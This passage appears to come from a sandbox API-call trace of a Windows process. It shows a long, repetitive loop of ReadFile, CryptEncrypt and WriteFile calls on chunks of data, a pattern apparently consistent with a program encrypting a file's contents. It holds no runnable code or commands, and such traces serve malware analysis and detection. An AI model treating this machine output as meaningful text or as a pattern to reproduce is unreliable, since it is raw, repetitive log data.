Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.340] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.340] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.340] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.340] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.340] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.340] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.340] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.341] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.341] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.341] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.341] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.341] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.341] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.341] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.342] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.342] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.342] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.342] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.342] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.342] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.342] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.342] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.342] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.343] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.343] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.343] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.343] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.343] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.343] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.343] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.343] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.343] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.343] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.343] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.343] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.343] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.343] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.343] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.343] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.343] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.343] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.344] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.344] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.344] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.344] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.344] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.344] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.344] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.344] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.344] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.344] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.344] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.344] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.344] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.344] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.344] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.344] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.344] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.345] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.345] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.345] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.345] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.345] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.345] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.345] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.345] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.345] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.345] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.345] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.345] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.345] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.345] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.345] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.345] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.345] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.345] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.346] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.346] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.346] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.346] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.346] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.346] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.346] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.346] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.346] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.346] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.346] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.346] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.346] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.346] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.346] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.346] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.346] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.346] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.347] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.347] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.347] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.347] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.347] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.347] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.347] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.347] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.347] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, 